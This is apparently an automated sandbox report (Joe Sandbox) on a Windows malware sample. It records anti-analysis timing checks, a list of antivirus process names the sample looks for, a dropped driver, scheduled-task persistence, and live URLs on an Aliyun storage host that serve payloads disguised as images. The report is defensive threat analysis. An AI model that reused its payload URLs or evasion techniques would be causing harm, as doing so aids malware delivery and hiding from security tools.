Source: C:\Users\user\Documents\XXiUpO.exeMemory written: PID: 3916 base: 7FFDB442D9F0 value: E9 20 26 16 00 Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeRDTSC instruction interceptor: First address: 140001133 second address: 14000114A instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeRDTSC instruction interceptor: First address: 14000114A second address: 14000114A instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F5944B71EB0h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeWindow / User API: threadDelayed 639Jump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeWindow / User API: threadDelayed 360Jump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\XXiUpO.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-14029
Source: C:\Users\user\Documents\XXiUpO.exeAPI coverage: 2.7 %
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exe TID: 6800Thread sleep count: 639 > 30Jump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exe TID: 6800Thread sleep time: -319500s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exe TID: 6800Thread sleep count: 360 > 30Jump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exe TID: 6800Thread sleep time: -180000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00007FFDAC09A1B8 FindFirstFileExW,5_2_00007FFDAC09A1B8
Source: e2664726330-76546233.05.exe, 00000000.00000003.2966560472.000000000012D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Documents\XXiUpO.exeAPI call chain: ExitProcess graph end nodegraph_5-14030
Source: C:\Users\user\Documents\XXiUpO.exeAPI call chain: ExitProcess graph end nodegraph_5-14374
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00000001400073E0 LdrLoadDll,5_2_00000001400073E0
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0000000140007C91
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_000000014000F000
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,5_2_0000000140004630
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0000000140007C91
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00000001400106B0
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00000001400092E0 SetUnhandledExceptionFilter,5_2_00000001400092E0
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00007FFDAC092630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFDAC092630
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00007FFDAC0976E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFDAC0976E0
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00007FFDAC091F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFDAC091F50

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Documents\XXiUpO.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
Source: C:\Users\user\Documents\XXiUpO.exeNtProtectVirtualMemory: Indirect: 0x2A6B253Jump to behavior
Source: C:\Users\user\Desktop\e2664726330-76546233.05.exeNtDelayExecution: Indirect: 0x1F94DBJump to behavior
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00007FFDAC09FD40 cpuid 5_2_00007FFDAC09FD40
Source: C:\Users\user\Documents\XXiUpO.exeCode function: GetLocaleInfoA,5_2_000000014000F370
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_000000014000A370
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_0000000140005A70
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: XXiUpO.exe, 00000005.00000002.3127978849.0000000002838000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,5_2_00000001400042B0
Source: C:\Users\user\Documents\XXiUpO.exeCode function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,5_2_0000000140003F80
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
Service Execution
24
Windows Service
1
Access Token Manipulation
31
Masquerading
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Credential API Hooking
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
24
Windows Service
1
Virtualization/Sandbox Evasion
LSASS Memory131
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Process Injection
1
Access Token Manipulation
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Abuse Elevation Control Mechanism
1
Process Injection
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp
DCSync123
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
e2664726330-76546233.05.exe0%ReversingLabs
e2664726330-76546233.05.exe7%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\Documents\XXiUpO.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://basdy1.oss-cn-beijing.aliyuncs.com/J0%Avira URL Cloudsafe
https://basdy1.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://basdy1.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
https://basdy1.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
https://basdy1.oss-cn-beijing.aliyuncs.com/AppData0%Avira URL Cloudsafe
https://basdy1.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
https://basdy1.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
https://basdy1.oss-cn-beijing.aliyuncs.com/7-2476756634-10030%Avira URL Cloudsafe
https://basdy1.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
https://basdy1.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
https://basdy1.oss-cn-beijing.aliyuncs.com/0%Avira URL Cloudsafe
https://basdy1.oss-cn-beijing.aliyuncs.com/i.datY0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
basdy1.oss-cn-beijing.aliyuncs.com
59.110.190.44
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://basdy1.oss-cn-beijing.aliyuncs.com/a.giffalse
    • Avira URL Cloud: safe
    unknown
    https://basdy1.oss-cn-beijing.aliyuncs.com/c.giffalse
    • Avira URL Cloud: safe
    unknown
    https://basdy1.oss-cn-beijing.aliyuncs.com/s.jpgfalse
    • Avira URL Cloud: safe
    unknown
    https://basdy1.oss-cn-beijing.aliyuncs.com/b.giffalse
    • Avira URL Cloud: safe
    unknown
    https://basdy1.oss-cn-beijing.aliyuncs.com/d.giffalse
    • Avira URL Cloud: safe
    unknown
    https://basdy1.oss-cn-beijing.aliyuncs.com/i.datfalse
    • Avira URL Cloud: safe
    unknown
    https://basdy1.oss-cn-beijing.aliyuncs.com/s.datfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://basdy1.oss-cn-beijing.aliyuncs.com/Je2664726330-76546233.05.exe, 00000000.00000003.2966560472.0000000000171000.00000004.00000020.00020000.00000000.sdmp, e2664726330-76546233.05.exe, 00000000.00000003.2967606330.0000000000171000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://crl.thawte.com/ThawteTimestampingCA.crl0e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.dr, 189atohci.sys.0.drfalse
      high
      http://www.symauth.com/rpa00e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drfalse
        high
        https://basdy1.oss-cn-beijing.aliyuncs.com/AppDatae2664726330-76546233.05.exe, 00000000.00000003.2966560472.0000000000171000.00000004.00000020.00020000.00000000.sdmp, e2664726330-76546233.05.exe, 00000000.00000003.2967606330.0000000000171000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://ocsp.thawte.com0e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.dr, 189atohci.sys.0.drfalse
          high
          http://www.symauth.com/cps0(e2664726330-76546233.05.exe, 00000000.00000003.3024292312.000000000A62C000.00000004.00000020.00020000.00000000.sdmp, XXiUpO.exe.0.drfalse
            high
            https://basdy1.oss-cn-beijing.aliyuncs.com/7-2476756634-1003e2664726330-76546233.05.exe, 00000000.00000003.2966560472.0000000000171000.00000004.00000020.00020000.00000000.sdmp, e2664726330-76546233.05.exe, 00000000.00000003.2967606330.0000000000171000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://basdy1.oss-cn-beijing.aliyuncs.com/e2664726330-76546233.05.exe, 00000000.00000003.2966560472.000000000011F000.00000004.00000020.00020000.00000000.sdmp, e2664726330-76546233.05.exe, 00000000.00000003.2966560472.0000000000171000.00000004.00000020.00020000.00000000.sdmp, e2664726330-76546233.05.exe, 00000000.00000003.2967606330.0000000000171000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://basdy1.oss-cn-beijing.aliyuncs.com/i.datYe2664726330-76546233.05.exe, 00000000.00000003.2966560472.0000000000171000.00000004.00000020.00020000.00000000.sdmp, e2664726330-76546233.05.exe, 00000000.00000003.2967606330.0000000000171000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            59.110.190.44
            basdy1.oss-cn-beijing.aliyuncs.comChina
            37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1585824
            Start date and time:2025-01-08 10:09:08 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 17s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:6
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:e2664726330-76546233.05.exe
            Detection:MAL
            Classification:mal80.evad.winEXE@2/12@1/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 74%
            • Number of executed functions: 6
            • Number of non-executed functions: 104
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            TimeTypeDescription
            04:09:59API Interceptor941x Sleep call for process: e2664726330-76546233.05.exe modified
            10:11:39Task SchedulerRun new task: RoKJp path: C:\Users\user\Documents\XXiUpO.exe
            No context
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdmiori.m68k.elfGet hashmaliciousUnknownBrowse
            • 8.138.112.162
            sora.ppc.elfGet hashmaliciousUnknownBrowse
            • 8.151.21.103
            sora.spc.elfGet hashmaliciousMiraiBrowse
            • 120.78.217.242
            sora.arm7.elfGet hashmaliciousMiraiBrowse
            • 8.152.213.68
            sora.mips.elfGet hashmaliciousMiraiBrowse
            • 139.244.36.195
            miori.arm5.elfGet hashmaliciousUnknownBrowse
            • 59.83.20.240
            miori.spc.elfGet hashmaliciousUnknownBrowse
            • 106.14.40.50
            miori.arm.elfGet hashmaliciousUnknownBrowse
            • 8.135.254.112
            miori.sh4.elfGet hashmaliciousUnknownBrowse
            • 8.139.169.1
            23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
            • 39.103.20.93
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            37f463bf4616ecd445d4a1937da06e19chu4rWexSX.exeGet hashmaliciousLummaCBrowse
            • 59.110.190.44
            xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
            • 59.110.190.44
            leBwnyHIgx.exeGet hashmaliciousGhostRatBrowse
            • 59.110.190.44
            c2.htaGet hashmaliciousRemcosBrowse
            • 59.110.190.44
            c2.htaGet hashmaliciousRemcosBrowse
            • 59.110.190.44
            setup.msiGet hashmaliciousUnknownBrowse
            • 59.110.190.44
            1.exeGet hashmaliciousLummaC, XRedBrowse
            • 59.110.190.44
            9876567899.bat.exeGet hashmaliciousLokibotBrowse
            • 59.110.190.44
            23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
            • 59.110.190.44
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\Documents\XXiUpO.exe23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
              287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                287438657364-7643738421.08.exeGet hashmaliciousUnknownBrowse
                  2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                    2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                      2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                        2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                          45631.exeGet hashmaliciousNitolBrowse
                            45631.exeGet hashmaliciousUnknownBrowse
                              0000000000000000.exeGet hashmaliciousNitolBrowse
                                Process:C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):125333
                                Entropy (8bit):7.993522712936246
                                Encrypted:true
                                SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                MD5:2CA9F4AB0970AA58989D66D9458F8701
                                SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                Process:C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                Category:dropped
                                Size (bytes):8299
                                Entropy (8bit):7.9354275320361545
                                Encrypted:false
                                SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............
                                Process:C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):3892010
                                Entropy (8bit):7.995495589600101
                                Encrypted:true
                                SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                Process:C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):512
                                Entropy (8bit):5.3310747900515585
                                Encrypted:false
                                SSDEEP:6:Wsv+Xa3b16QeCrCa2BIDRKTV1SsYRh4M7OdUzW9E40/qcX:tgQpMBIDRKTV1XYRhdgUzWg3
                                MD5:D71E7AEE9700E286B3E41BD7F8F6E256
                                SHA1:1E979956B3408409657F0E249CEDCDF373E55A6E
                                SHA-256:58136B21F0B09C98335BABC996763433C188D02C8DF3E1A1F301DD8A025B52EC
                                SHA-512:7818BC944658E0998F18442F7A140F9848C2FD7963A95441E533FBBCEDADE681F3480880E9C68560C79B1498A4812CE0A85412DC8F8E171DF2160B6A930A97EE
                                Malicious:false
                                Reputation:low
                                Preview:....l%00RQCT-ez;HH.X6u:=TWTS4}2?VFJQ2".2]_.S}4:555555555555555555555555555555555]AAE6.jj....w? a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33QR@W.fy8KK.[5v9>WTWP7~1<UEIR1!|1^\.R|5;444444444444444444444444444444444\@@D7~kk....v>!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll
                                Process:C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):135589
                                Entropy (8bit):7.995304392539578
                                Encrypted:true
                                SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                SHA1:561836F6228E24180238DF9456707A2443C5795C
                                SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                Malicious:false
